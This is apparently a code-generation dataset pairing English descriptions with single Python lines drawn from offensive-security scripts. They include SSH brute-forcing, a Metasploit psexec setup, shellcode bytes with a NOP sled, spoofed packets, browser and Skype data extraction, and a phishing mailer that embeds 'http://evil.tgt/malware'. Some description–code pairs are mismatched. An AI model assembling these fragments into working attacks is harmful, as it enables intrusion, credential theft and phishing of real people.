"Execute the command 'SELECT tbl_name FROM sqlite_master WHERE type==\""table\"";' on c" "c.execute('SELECT tbl_name FROM sqlite_master WHERE type==\""table\"";')"
153 |
Import the library for spawning applications import pexpect
154 |
Assign to kmldoc the concatenation of kmlheader the result of the function plotIPs with argument pcap and kmlfooter kmldoc=kmlheader+plotIPs(pcap)+kmlfooter
155 |
Assign to ab the anonBrowser with parameters proxies equals to an empty list and user_agents equals to a list with inside a tuple made of 'User-agent' and 'superSecretBrowser' ab = anonBrowser(proxies=[],user_agents=[('User-agent','superSecretBroswer')])
156 |
Define main function with no arguments def main():
157 |
Call the class BoundedSemaphore with argument value equals to maxConnections and assign to connection_lock connection_lock = BoundedSemaphore(value=maxConnections)
158 |
Call the method parse_args with no argument and assign it to the tuple made of options and args (options, args) = parser.parse_args()
159 |
Assign to passwdFile the value passwdFile of options passwdFile = options.passwdFile
160 |
Call the method write of configFile with argument 'use exploit/windows/smb/psexec\n' configFile.write('use exploit/windows/smb/psexec\\n')
161 |
Call the class Client with argumet host, user and password and assign it to client client = Client(host, user, password)
162 |
"Use the command ""SELECT datetime(timestamp,'unixepoch'),dialog_partner, author, body_xml FROM Messages;""" "c.execute(""SELECT datetime(timestamp,'unixepoch'),dialog_partner, author, body_xml FROM Messages;"")"
163 |
Assign the result of the method pxssh on pxssh with no argument to s s = pxssh.pxssh()
164 |
Call the method write of configFile with argument 'set payload ' and continue to the next line the argument and the concatenation configFile.write('set payload '+\
165 |
If the variable pcapFile of options is equal to None if options.pcapFile == None:
166 |
Define the method __init__ with arguments self, title, text and url def __repr__(self):
167 |
Return results return results
168 |
Call the method add_option with arguments '-d', dest equals to 'dir', type equals to 'string' and help equals to 'specify destination directory' parser.add_option('-d', dest='dir', type='string',help='specify destination directory')
169 |
Assign the value password to self.password self.password = password
170 |
"and ""\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8""" """\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"""
171 |
Define the function printNets with argument username and password def printNets(username, password):
172 |
"and ""\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0""" """\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"""
173 |
Open the document pcapFile and assign it to f f = open(pcapFile)
174 |
"Execute the command ""select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;""on c" "c.execute(""select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;"")"
175 |
Else if ret equals 3 elif ret == 3:
176 |
Call the method open with argument url of ab and assign it to page page = ab.open(url)
177 |
Define the function printContacts with argument skypeDB def printContacts(skypeDB):
178 |
Call the function spawn with argument connStr of the library pexpect and assign it to child child = pexpect.spawn(connStr)
179 |
Call the method read of page with no argument html = page.read()
180 |
Define the function findRecycled with argument recycleDir def findRecycled(recycleDir):
181 |
Create a packet pkt with source src, destination dst, UDP with destination port 31335 and the load equals to 'PONG' pkt = IP(src=src,dst=dst)/UDP(dport=31335)/Raw(load='PONG')
182 |
Call the method get with arguments tag and tag and assign of TAGS and assign it to decoded decoded = TAGS.get(tag, tag)
183 |
Define the function __init__ with arguments self and handle def __init__(self, handle):
184 |
Assign to handle of self handle self.handle = handle
185 |
Assign to tweets of self the result of the method get_tweets with no argument of self self.tweets = self.get_tweets()
186 |
Define the function get_tweets with argument self def get_tweets(self):
187 |
Assign to query the result of the method quote_plus of urllib with argument the concatenation of 'from:', handle of self and ' since:2009-01-01 include:retweets' query = urllib.quote_plus('from:' + self.handle+ ' since:2009-01-01 include:retweets')
188 |
Assign an empty list to tweets tweets = []
189 |
Assign to browser the class anonBrowser called with no arguments browser = anonBrowser()
190 |
Call the method anonymize with no argument of browser browser.anonymize()
191 |
Assign to response the result of the method open of browser with argument the concatenation of 'http://search.twitter.com/'+ 'search.json?q=' and query response = browser.open('http://search.twitter.com/'+ 'search.json?q=' + query)
192 |
Assign to json_object the result of the method load of json with argument response json_objects = json.load(response)
193 |
For each result in json_objects with key 'results' for result in json_objects['results']:
194 |
Assign to new_result an empty dictionary new_result = {}
195 |
Assign to new_result with key 'from_user' the value of result with key 'from_user_name' new_result['from_user'] = result['from_user_name']
196 |
Assign to new_result with key 'geo' the value of result with key 'geo' new_result['geo'] = result['geo']
197 |
Assign to new_result with key 'tweet' the value of result with key 'text' new_result['tweet'] = result['text']
198 |
Append to tweets the new_result tweets.append(new_result)
199 |
Return the tweets return tweets
200 |
Define the function find_interests with argument self def find_interests(self):
201 |
Create an empty dictionary and assign it to interests interests = {}
202 |
Create an empty list and assign it to interest with key 'links' interests['links'] = []
203 |
Create an empty list and assign it to interest with key 'users' interests['users'] = []
204 |
Create an empty list and assign it to interest with key 'hashtags' interests['hashtags'] = []
205 |
Assign to the text the value of tweet with jey tweet text = tweet['tweet']
206 |
Assign to links the result of the function compile of re with argument '(http.*?)\Z|(http.*?) ' then call the function findall with argument text links = re.compile().findall(text)
207 |
For each link in links for link in links:
208 |
If link at position 0 exists if link[0]:
209 |
Assign to link the link at the position 0 link = link[0]
210 |
Else if link at position 1 exists elif link[1]:
211 |
Assign to link the link at the position 1 link = link[1]
212 |
Else else:
213 |
Continue continue
214 |
Assign to response the result of the method urlopen of urllib2 with argument link response = urllib2.urlopen(link)
215 |
Assign to full_link the variable url of response full_link = response.url
216 |
Append to interests with key links the variable full_link interests['links'].append(full_link)
217 |
Except except:
218 |
Append to interests with key 'users' the result of the function findall with argument text called on compile of re with argument '(@\w+)' interests['users'] += re.compile('(@\w+)').findall(text)
219 |
Append to interests with key 'hashtags' the result of the function findall with argument text called on compile of re with argument '(#\w+)' interests['hashtags'] += re.compile('(#\w+)').findall(text)
220 |
Sort the list interests with key 'users' interests['users'].sort()
221 |
Sort the list interests with key 'hashtags' interests['hashtags'].sort()
222 |
Sort the list interests with key 'links' interests['links'].sort()
223 |
Return the interests return interests
224 |
Define the function twitter_locate with arguments self and cityFile def twitter_locate(self, cityFile):
225 |
Assign an empty list to cities cities = []
226 |
If cityFile is not equal to None if cityFile != None:
227 |
For each line in the method readlines called with no arguments of the opened file cityFile for line in open(cityFile).readlines():
228 |
Assign to city the string stripped of '\n' and '\r' in low case city = line.strip('\\n').strip('\r').lower()
229 |
Append to the list cities the city cities.append(city)
230 |
Assign to locations an empty list locations = []
231 |
Assign to locCnt the value 0 locCnt = 0
232 |
Assign to cityCnt the value 0 cityCnt = 0
233 |
Assign to tweetsText an empty string tweetsText = ''
234 |
For each tweet in tweets of self for tweet in self.tweets:
235 |
If tweet with key 'geo' is not equal to None if tweet['geo'] != None:
236 |
Append to locations the tweet with key 'geo' locations.append(tweet['geo'])
237 |
Increment locCnt of 1 locCnt += 1
238 |
Concatenate to tweetsText the tweet with key 'tweet' in lower case tweetsText += tweet['tweet'].lower()
239 |
For each city in cities for city in cities:
240 |
If the substring city is in tweetsText if city in tweetsText:
241 |
Append to locations the value city locations.append(city)
242 |
Increment cityCnt of 1 cityCnt += 1
243 |
Return the value locations return locations
244 |
Call the method quote_plus of urllib with argument the concatenation of 'from:', handle and ' since:2009-01-01 include:retweets' query = urllib.quote_plus('from:' + handle+ ' since:2009-01-01 include:retweets')
245 |
Assign to response the result of the the method open of browser with argument the concatenation of 'http://search.twitter.com/', 'search.json?q=' and query response = browser.open('http://search.twitter.com/'+ 'search.json?q='+ query)
246 |
Define the function load_cities with argument cityFile def load_cities(cityFile):
247 |
Assign an empty list to cities cities = []
248 |
For each line in the method readlines with no argument of the opened file cityFile for line in open(cityFile).readlines():
249 |
Assign the line stripped of '\n' and '\r' in lower case to city city=line.strip('\\n').strip('\r').lower()
250 |
Append city to cities cities.append(city)
251 |
Return the variable cities return cities
252 |
Define the function twitter_locate with arguments tweets and cities def twitter_locate(tweets,cities):
253 |
Assign an empty list to locations locations = []
254 |
Assign 0 to locCnt locCnt = 0
255 |
Assign 0 to cityCnt cityCnt = 0
256 |
Assign to tweetsText an empty string "tweetsText = """""
257 |
If tweet with key 'geo' is not equal to None if tweet['geo'] != None:
258 |
Append the tweet with key 'geo' to locations locations.append(tweet['geo'])
259 |
Increment locCnt of 1 locCnt += 1
260 |
Concatenate the tweet with key 'tweet' to tweetsText in lower case tweetsText += tweet['tweet'].lower()
261 |
For each city in cities for city in cities:
262 |
If the substring city is in tweetsText if city in tweetsText:
263 |
Append the city to locations locations.append(city)
264 |
Increment cityCnt of 1 cityCnt+=1
265 |
Return the variable locations return locations
266 |
Define the function main with no arguments def main():
267 |
Assign to parser the OptionParser with argument the concatenation of 'usage %prog ' and '-u <twitter handle> [-c <list of cities>]' of optparse parser = optparse.OptionParser('usage %prog '+ '-u <twitter handle> [-c <list of cities>]')
268 |
Call the method add_option with arguments '-c', dest equals to 'cityFile', type equals to 'string' and help= equals to 'specify file containing cities to search' parser.add_option('-c', dest='cityFile', type='string',help='specify file containing cities to search')
269 |
Assign cityFile of options to cityFile cityFile = options.cityFile
270 |
If handle is equal to None if (handle==None):
271 |
Call the function exit to 0 exit(0)
272 |
Assign an empty list to to cities cities = []
273 |
If cityFile is not equal to None if (cityFile!=None):
274 |
Call the function load_cities with argument cityFile and assign the result to cities cities = load_cities(cityFile)
275 |
Assign the result of the function twitter_locate with argument tweets and cities to location locations = twitter_locate(tweets,cities)
276 |
Import the library dedicated to regular expressions import re
277 |
Import the second version of the http client import urllib2
278 |
Define the function get_tweets with argument handle def get_tweets(handle):
279 |
Call the method quote_plus of urllib with argument the concatenation of 'from:', handle and ' since:2009-01-01 include:retweets' query = urllib.quote_plus('from:' + handle+ ' since:2009-01-01 include:retweets')
280 |
Assign to tweets an empty list tweets = []
281 |
Assign to browser the class anonBrowser with no argument browser = anonBrowser()
282 |
Call the method of browser anonymize with no arguments browser.anonymize()
283 |
Assign to response the result of the the method open of browser with argument the concatenation of 'http://search.twitter.com/', 'search.json?q=' and query response = browser.open('http://search.twitter.com/'+ 'search.json?q=' + query)
284 |
Assign to json_objects the result of the method load of json with argument response json_objects = json.load(response)
285 |
For each result in json_objects with key 'result' for result in json_objects['results']:
286 |
Assign to new_result an empty dictionary new_result = {}
287 |
Assign to new_result with key 'from_user' the variable result with key 'from_user_name' new_result['from_user'] = result['from_user_name']
288 |
Assign to new_result with key 'geo' the variable result with key 'geo' new_result['geo'] = result['geo']
289 |
Assign to new_result with key 'tweet' the variable result with key 'text' new_result['tweet'] = result['text']
290 |
Append to tweets the new_result tweets.append(new_result)
291 |
Return the variable tweets return tweets
292 |
Define the function find_interests with argument tweets def find_interests(tweets):
293 |
Assign to interests an empty dictionary interests = {}
294 |
Assign to interests with key 'links' an empty list interests['links'] = []
295 |
Assign to interests with key 'users' an empty list interests['users'] = []
296 |
Assign to interests with key 'hashtags' an empty list interests['hashtags'] = []
297 |
For each tweet in tweets for tweet in tweets:
298 |
Assign the tweet with key 'tweet' to text text = tweet['tweet']
299 |
Call the method findall with argument text of the function compile with argument '(http.*?)\Z|(http.*?) ' of the library re and assign it to links links = re.compile().findall(text)
300 |
For each link in links for link in links:
301 |
If link in position 0 exists if link[0]:
302 |
Assign link in position 0 to link link = link[0]
303 |
Else if link in position 1 exists elif link[1]:
304 |
Assign link in position 1 to link link = link[1]
305 |
Else else:
306 |
Continue continue
307 |
Start try block try:
308 |
Assign the result of the function urlopen with argument link of urllib2 response = urllib2.urlopen(link)
309 |
Assign the response of url to full_link full_link = response.url
310 |
Append full_link to interests with key links interests['links'].append(full_link)
311 |
Excepet except:
312 |
Do nothing pass
313 |
Link the result of the function findall with argument text of the function compile with argument '(@\w+)' of re to interests with key 'users' interests['users'] += re.compile('(@\w+)').findall(text)
314 |
Link the result of the function findall with argument text of the function compile with argument '(#\w+)' of re to interests with key 'hashtags' interests['hashtags'] += re.compile('(#\w+)').findall(text)
315 |
Sort the list interests with key 'users' interests['users'].sort()
316 |
Sort the list interests with key 'hashtags' interests['hashtags'].sort()
317 |
Sort the list interests with key 'links' interests['links'].sort()
318 |
Return the variable interests return interests
319 |
Define the main function with no arguments def main():
320 |
Assign to parser the OptionParser with argument the concatenation of 'usage %prog ' and '-u <twitter handle>' of optparse parser = optparse.OptionParser('usage %prog '+ '-u <twitter handle>')
321 |
Call the method add_option with arguments '-u', dest equals to 'handle', type equals to 'string' and help= equals to 'specify twitter handle' parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
322 |
If handle is equal to None if handle == None:
323 |
Call the function exit to 0 exit(0)
324 |
Assign to tweets the result of the function get_tweets with argument handle tweets = get_tweets(handle)
325 |
Assign the result of the function find_interests with argument tweets to interests interests = find_interests(tweets)
326 |
Import the library to manage json files import json
327 |
Import a http client import urllib
328 |
From the library to manages an anonymous browser import everything from anonBrowser import *
329 |
Define the class reconPerson class reconPerson:
330 |
Define the function __init__ with arguments self, first_name, last_name, job equals to '' and social media equals to {} def __init__(self,first_name,last_name, job='',social_media={}):
331 |
Assign to first_name of self the value first_name self.first_name = first_name
332 |
Assign to last_name of self the value last_name self.last_name = last_name
333 |
Assign to job of self the value job self.job = job
334 |
Assign to social_media of self the value social_media self.social_media = social_media
335 |
Define the method __repr__ with argument self def __repr__(self):
336 |
Return the concatenation of first_name of self, ' ', last_name of self + ' has job ' + job of self return self.first_name + ' ' + self.last_name + ' has job ' + self.job
337 |
Define the method get_social with arguments self and media_name def get_social(self, media_name):
338 |
If the variable social_media of self has the key media_name if self.social_media.has_key(media_name):
339 |
Return the variable social_media with key media_nameof self return self.social_media[media_name]
340 |
Return nothing return None
341 |
Define the method query_twitter with argument self and query def query_twitter(self, query):
342 |
Assign to query the result of the function quote_plus of urllib with argument query query = urllib.quote_plus(query)
343 |
Assign to results an empty list results = []
344 |
Assign an instance of anonBrowser with no argument to browser browser = anonBrowser()
345 |
Assign to response the result of the method open of browser with argument the concatenation of 'http://search.twitter.com/search.json?q=' and query response = browser.open( 'http://search.twitter.com/search.json?q='+ query)
346 |
Assign to json_object the result of the function json_load of json with argument response json_objects = json.load(response)
347 |
For each result in json_object with key response for result in json_objects['results']:
348 |
Assign an empty dictionary to new_result new_result = {}
349 |
Assign result with key 'from_user_name' to new_result with key 'from_user' new_result['from_user'] = result['from_user_name']
350 |
Assign result with key 'geo' to new_result with key 'geo' new_result['geo'] = result['geo']
351 |
Assign result with key 'text' to new_result with key 'tweet' new_result['tweet'] = result['text']
352 |
Append new_result to results results.append(new_result)
353 |
Return results return results
354 |
Call the function reconPerson with arguments 'Boondock' and 'Saint' and assign it to ap ap = reconPerson('Boondock', 'Saint')
355 |
Assign 'username' to user user = 'username'
356 |
Assign 'password' to pwd pwd = 'password'
357 |
Call the function sendMail with argument user, pwd, '[email protected]', 'Re: Important' and 'Test Message' sendMail(user, pwd, '[email protected]' 'Re: Important', 'Test Message')
358 |
Import the library to send an email with smtp import smtplib
359 |
Import the library to parse strings import optparse
360 |
From the library to manage the text of the email in mime format import MIMEText from email.mime.text import MIMEText
361 |
From twitterClass import everything from twitterClass import *
362 |
From the library to manage randomess import choice from random import choice
363 |
define the function sendMail with arguments user, pwd, to, subject and text def sendMail(user,pwd,to,subject,text):
364 |
Assign an object MIMEText with argument text to msg msg = MIMEText(text)
365 |
Assign user to msg with 'From' msg['From'] = user
366 |
Assign to to msg with key 'To' msg['To'] = to
367 |
Assign subject to msg with key 'Subject' msg['Subject'] = subject
368 |
Start try block try:
369 |
Assign the result of the function SMTP of smtplib with arguments 'smtp.gmail.com and 587 to smtpServer smtpServer = smtplib.SMTP('smtp.gmail.com', 587)
370 |
Call the method starttls with no argument of smtpServer smtpServer.starttls()
371 |
Call the method ehlo with no argument of smtpServer smtpServer.ehlo()
372 |
Call the method login with arguments user and pwd of smtpServer smtpServer.login(user, pwd)
373 |
Call the method sendmail with arguments user, to and the method as_string with no argument of msg of smtpServer smtpServer.sendmail(user, to, msg.as_string())
374 |
Call the method close with no argument of smtpServer smtpServer.close()
375 |
Expect except:
376 |
Do nothing pass
377 |
Define the main function with no argument def main():
378 |
Assign to parser the OptionParser with argument the concatenation of 'usage %prog ' ,'-u <twitter target> -t <target email> ' and '-l <gmail login> -p <gmail password>' -d <destination directory>' of optparse parser = optparse.OptionParser('usage %prog '+ '-u <twitter target> -t <target email> '+ '-l <gmail login> -p <gmail password>')
379 |
Call the method add_option with arguments '-u', dest equals to 'handle', type equals to 'string' and help equals to 'specify twitter handle' parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
380 |
Call the method add_option with arguments '-t', dest equals to 'tgt', type equals to 'string' and help equals to 'specify target email' parser.add_option('-t', dest='tgt', type='string', help='specify target email')
381 |
Call the method add_option with arguments '-l', dest equals to 'user', type equals to 'string' and help equals to 'specify gmail login' parser.add_option('-l', dest='user', type='string', help='specify gmail login')
382 |
Call the method add_option with arguments '-p', dest equals to 'pwd', type equals to 'string' and help equals to 'specify gmail password' parser.add_option('-p', dest='pwd', type='string', help='specify gmail password')
383 |
Assign to the tuple of options and args the result of the method parse_args with no argument of parser (options, args) = parser.parse_args()
384 |
Assign handle of options to handle handle = options.handle
385 |
Assign tgt of options to tgt tgt = options.tgt
386 |
Assign user of options to user user = options.user
387 |
Assign pwd of options to pwd pwd = options.pwd
388 |
If handle is equal to None or tgt is equal to None or user is equal to None or pwd is equal to None: if handle == None or tgt == None or user ==None or pwd==None:
389 |
Call the function exit with argument 0 exit(0)
390 |
Assign the result of the function reconPerson with argument handle to spamTgt spamTgt = reconPerson(handle)
391 |
Call the method get_tweets with no argument of spamTgt spamTgt.get_tweets()
392 |
Call the method find_interests with no argument of spamTgt to interests interests = spamTgt.find_interests()
393 |
Call the method twitter_locate of spamTgt with argument 'mlb-cities.txt' and assign it to location location = spamTgt.twitter_locate('mlb-cities.txt')
394 |
"Assign the concatenation of ""Dear"", tgt and "","" to spamMsg" "spamMsg = ""Dear ""+tgt+"","""
395 |
If location is not equal to None if (location!=None):
396 |
Assign the result of the function choice with argument location to randLoc randLoc=choice(location)
397 |
"Concatenate the concatenation of "" Its me from "", randLoc and ""."" to spamMsg" "spamMsg += "" Its me from ""+randLoc+""."""
398 |
If interests with key 'users' is not equal to None if (interests['users']!=None):
399 |
Assign to randUser the result of the function choice with argument interests with key 'users' randUser=choice(interests['users'])
400 |
"Concatenate the concatenation of "" "", randUser and "" said to say hello."" to spamMsg" "spamMsg += "" ""+randUser+"" said to say hello."""
401 |
If interests with key 'hashtags' is not equal to None if (interests['hashtags']!=None):
402 |
Assign to randHash the result of the function choice with argument interests with key 'hashtags' randHash=choice(interests['hashtags'])
403 |
"Concatenate the concatenation of "" Did you see all the fuss about "", randHash and ""?"" to spamMsg" "spamMsg += "" Did you see all the fuss about ""+ randHash+""?"""
404 |
If interests with key 'links' is not equal to None if (interests['links']!=None):
405 |
Assign to randLink the result of the function choice with argument interests with key 'links' randLink=choice(interests['links'])
406 |
"Concatenate the concatenation of "" I really liked your link to: "", randLink and ""."" to spamMsg" "spamMsg += "" I really liked your link to: ""+ randLink+""."""
407 |
"Concatenate to spamMessage the string "" Check out my link to http://evil.tgt/malware""" "spamMsg += "" Check out my link to http://evil.tgt/malware"""
408 |
Call the function sendMail with argument user, pwd, '[email protected]', 'Re: Important' and spamMsg sendMail(user, pwd, tgt, 'Re: Important', spamMsg)
409 |
Call the function connect with arguments user, host, keyfile and False connect(user, host, keyfile, False)
410 |
Assign to IPlayer the IP with src equals to src and dst equals to tgt IPlayer = IP(src=src, dst=tgt)
411 |
"and ""\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7""" """\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"""
412 |
Send the packet to iface and count equals count send(pkt)
413 |
"Call the object OptionParser with argument 'usage %prog "" of optParse and assign it to parser" "parser = optparse.OptionParser('usage %prog ""+\"
414 |
If synSpoof of options is equal to None or if srcSpoof of options is equal to None or if tgt of options is equal to None if options.synSpoof == None or options.srcSpoof == None or options.tgt == None:
415 |
If the function isMessageTable with argument iphoneDB returns True if isMessageTable(iphoneDB):
416 |
Import the library to manipulate request and response for http pages import mechanize
417 |
Set cookie_jar as a cookie collector of browser browser.set_cookiejar(cookie_jar)
418 |
Take the second argument of stream splitted at ':' and assign it to dst dst = stream.split(':')[1]
419 |
Call the function CloseKey with argument netKey CloseKey(netKey)
420 |
Define the function nmapScan with arguments tgtHost and tgtPort def nmapScan(tgtHost,tgtPort):
421 |
Assign to Fails the value 0 Fails = 0
422 |
Add the option of the parser H for tgtHost as a string with help specify target host parser.add_option('-H', dest='tgtHost', type='string',help='specify target host')
423 |
Call the function printLinks with argument url printLinks(url)
424 |
Call the function testProxy with argument url and hideMeProxy testProxy(url, hideMeProxy)
425 |
Import the libraries for file transfer protocol and time management import ftplib, time
426 |
"and ""\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea""" """\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"""
427 |
"and ""\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f""" """\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"""
428 |
Use c as a cursor for conn c = conn.cursor()
429 |
Call the function botnetCommand with argument 'cat /etc/issue' botnetCommand('cat /etc/issue')
430 |
Call the function printDownloads with argument downloadDB printDownloads(downloadDB)
431 |
Assign to the variable password the value 'toor' password = 'toor'
432 |
Call function FTP with argument hostname of the library ftplib and assign it to ftp ftp = ftplib.FTP(hostname)
433 |
If the substring '.php' or the substring '.htm' or the substring '.asp' is found in fn if '.php' in fn or '.htm' in fn or '.asp' in fn:
434 |
Call the function str with argument name and assign it to netName netName = str(name)
435 |
Call the function close with no argument of configFile configFile.close()
436 |
Continue the line with args equals to the tuple containing user, host, fullpath and True args=(user, host, fullpath, True))
437 |
"and ""\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85""" """\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"""
438 |
Call the function findHivemind of pcap findHivemind(pcap)
439 |
Exit function with no argument return
440 |
Assign to ackPkt the IPlayer divided by the TCPlayer ackPkt = IPlayer / TCPlayer
441 |
Call the method gethostbyname with argument tgtHost and assign the result to tgtIP tgtIP = gethostbyname(tgtHost)
442 |
Import the library to interact with the opearative system import os
443 |
Define the function printProfile with argument skypeDB def printProfile(skypeDB):
444 |
Assign to pkt the value of the function sr1 with arguments IP with argument dst equals to ipsrc, ICMP with no arguments, retry equals to 0, timeout equals to 1 and verbose equals to 0 pkt = sr1(IP(dst=ipsrc),ICMP(), retry=0, timeout=1, verbose=0)
445 |
Import the library to manage url import urllib
446 |
Assign to iface the value iface of options iface = options.iface
447 |
define the class Client class Client:
448 |
If the method has_key with argument rrname of dnsRecords is True if dnsRecords.has_key(rrname):
449 |
Define the function wiglePrint with argument username, password and netid def wiglePrint(username, password, netid):
450 |
"If the method iptype with no argument of the function IPTEST with argument ipsrc is equal to ""PRIVATE""" if IPTEST(ipsrc).iptype() == 'PRIVATE':
451 |
Call the function returnDefault with argument ftp returnDefault(ftp)
452 |
Assign to pathName the pathName of options pathName = options.pathName
453 |
Call the function smbBrute with arguments configFile, tgtHost, passwdFile, lhost and lport smbBrute(configFile,tgtHost,passwdFile,lhost,lport)
454 |
Define the function isMessageTable with argument iphoneDB def isMessageTable(iphoneDB):
455 |
Define the function spoofConn with arguments src, tgt and ack def spoofConn(src, tgt, ack):
456 |
Import the library to interact with the python environment import sys
457 |
Connect to the database cookiesDB and assign it to conn conn = sqlite3.connect(cookiesDB)
458 |
Add the options to parser '-t', dest equals to 'thresh', type equals to 'string', help equals to 'specify threshould count' parser.add_option('-t', dest='thresh', type='int',help='specify threshold count ')
459 |
Define function connScan with parameters tgtHost and tgtPort def connScan(tgtHost, tgtPort):
460 |
Start block expect except:
461 |
Call the method start on t and assign it to child child = t.start()
462 |
Import the second version of http client import urllib2
463 |
Assign to region the field 'region_name' of rec region = rec['region_name']
464 |
Define the function connect with arguments user,host,keyfile and release def connect(user,host,keyfile,release):
465 |
"and ""\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c""" """\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"""
466 |
Call the method lower with no argument of fileName and assign it to fn fn = fileName.lower()
467 |
Assign to diffSeq the difference of seqNum with preNum diffSeq = seqNum - preNum
468 |
Call exit function with argument 0 exit(0)
469 |
Assign to s the object socket with arguments AF_INET of socket and SOCK_STREAM of socket of socket s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
470 |
Else if the folder does not exists elif os.path.isdir(pathName) == False:
471 |
Call method expect with argument PROMPT of child child.expect(PROMPT)
472 |
Call the function connect with arguments user, host and password and assign it to child child = connect(user, host, password)
473 |
Start the try block try:
474 |
Exit the function with argument False return False
475 |
Add the options to parser '-p', dest equals to 'pcapFile', type equals to 'string', help equals to 'specify pcap filename' parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
476 |
Define the function testTTL with argument pkt def testTTL(pkt):
477 |
Import the library for port scanning import nmap
478 |
Assign to name the value of the function str with argument row at the position 1 name = str(row[1])
479 |
Increment unAnsReqs of one unAnsReqs = unAnsReqs + 1
480 |
"and ""\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a""" """\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"""
481 |
If the substring message is in the function str with argument row if 'message' in str(row):
482 |
Assign to geoLoc the variable country geoLoc = country
483 |
nan def main():
484 |
Assign to data the method read with no argument of the method open with argument image with key 'src' of ab data = ab.open(image['src']).read()
485 |
Assign 0 to preNum preNum = 0
486 |
Import the library to interact with the operative system import os
487 |
Assign to ipsrc the src of the method getlayer with argument IP of pkt ipsrc = pkt.getlayer(IP).src
488 |
Assign the value False to the variable Found Found = False
489 |
For each sport in range from 1023 to 65535 for sport in range(1024,65535):
490 |
Assign to params at the key 'netid' the value netid params['netid'] = netid
491 |
From the library to manipulate network packets import everything from scapy.all import *
492 |
Assign to downloadDB the path of 'downloads.sqlite' joined with pathName downloadDB = os.path.join(pathName, 'downloads.sqlite')
493 |
Exit function with argument False return False
494 |
If value Stop is true if Stop:
495 |
"and ""\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10""" """\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"""
496 |
Call the function storlines of ftp with arguments 'STOR ' concatenated to page and the function open with argument page concatenated to '.tmp' ftp.storlines('STOR ' + page, open(page + '.tmp'))
497 |
Call the method PortScanner with no argument and assign the result to nmScan nmScan = nmap.PortScanner()
498 |
Call the method add_option with arguments '-u' dest equals to 'username' and type equals to 'string', parser.add_option('-u', dest='username', type='string',
499 |
Assign to title of self the value title self.title = title
500 |
For each client in botNet for client in botNet:
501 |
Assign the value 0 to the variable Fails Fails = 0
502 |
import the library for instantiate a ssh function import pxssh
503 |
Connect to the database skypeDB conn = sqlite3.connect(skypeDB)
504 |
For each host in the method all_hosts called with no arguments of nmScan for host in nmScan.all_hosts():
505 |
Call the object OptionParser with arguments 'usage %prog ' parser = optparse.OptionParser('usage %prog '+\
506 |
Call the class Thread with arguments target equals to connect, args equal to the tuple host and user and assign it to t t = Thread(target=connect, args=(host, user,\
507 |
Call the method scan with arguments tgtHost and tgtPort on nmScan nmScan.scan(tgtHost,tgtPort)
508 |
Define the function printCookies with argument cookiesDB def printCookies(cookiesDB):
509 |
"Assign to padding the value ""\x90"" multiply by 150" "padding = ""\x90"" * 150"
510 |
For each filename in the method listdir with argument passDir of os for filename in os.listdir(passDir):
511 |
Call the method acquire with no arguments of connection_lock connection_lock.acquire()
512 |
Assign to city the field 'city' city = rec['city']
513 |
Define the list PROMPT with values '# ', '>>> ', '> ' and '\$ ' PROMPT = ['# ', '>>> ', '> ','\$ ']
514 |
Execute the command 'select datetime(date,\'unixepoch\'),address, text from message WHERE address>0;' on c c.execute('select datetime(date,\'unixepoch\'),address, text from message WHERE address>0;')
515 |
If tgt of options is equal to None if options.tgt == None:
516 |
If host is equal to None or if passwdFile is equal to None or if user is equal to None if host == None or passwdFile == None or user == None:
517 |
Exit function with value tgtHosts return tgtHosts
518 |
Define the function checkTTL with arguments ipsrc and ttl def checkTTL(ipsrc, ttl):
519 |
Assign the value 'guest' to userName userName = 'guest'
520 |
Send the messsage 'ViolentPython\r\n' connSkt.send('ViolentPython\r\\n')
521 |
If ret is equal to 0 if ret == 0:
522 |
Assign the value from nmScan sliced from host, 'tcp', 445 and 'state' and assign it to state state = nmScan[host]['tcp'][445]['state']
523 |
If release is equal to true if release:
524 |
If __name__ equals '__main__' if __name__ == '__main__':
525 |
Import the library for connections, the library to interact with the system, the library to manage time and the library containing structures import socket,sys,time,struct
526 |
Assign to pcapFile the variable pcapFile of options pcapFile = options.pcapFile
527 |
Call the method open with arguments 'https://wigle.net/gps/gps/main/login' and reqData of browser browser.open('https://wigle.net/gps/gps/main/login', reqData)
528 |
Import the library to manage regular expressions import re
529 |
Import the library to manage sockets import socket
530 |
Exit function with value '' return ''
531 |
Assign to username the value username of options username = options.username
532 |
If the method haslayer with argument IP of pkt is equals to True if pkt.haslayer(IP):
533 |
Continue the dictionary and the function with key 'credential_1'and value password 'credential_1': password})
534 |
